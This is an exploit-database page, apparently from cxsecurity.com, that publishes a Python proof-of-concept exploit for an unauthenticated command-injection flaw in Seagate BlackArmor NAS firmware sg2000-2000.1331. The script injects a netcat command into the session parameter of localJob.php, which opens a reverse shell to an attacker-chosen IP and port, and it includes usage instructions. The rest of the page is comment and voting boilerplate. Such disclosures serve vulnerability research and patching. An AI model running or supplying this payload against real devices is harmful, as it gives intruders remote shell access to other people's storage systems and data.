Seagate BlackArmor NAS sg2000-2000.1331 Command Injection

2021.07.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection # Date: 15.07.2021 # Discovered by: Jeroen - IT Nerdbox # Exploit Author: Metin Yunus Kandemir # Version: sg2000-2000.1331 # Vendor Homepage: https://www.seagate.com/ # Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ #!/usr/bin/python3 import requests import sys def exec(target, ncIp, ncPort): print("[!] Please check netcat listener: "+ ncPort) url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" r = requests.get(url = url) sys.exit(1) def main(args): if len(args) != 4: print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") sys.exit(1) exec(target=args[1], ncIp=args[2], ncPort=args[3]) if __name__ == "__main__": main(args=sys.argv)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top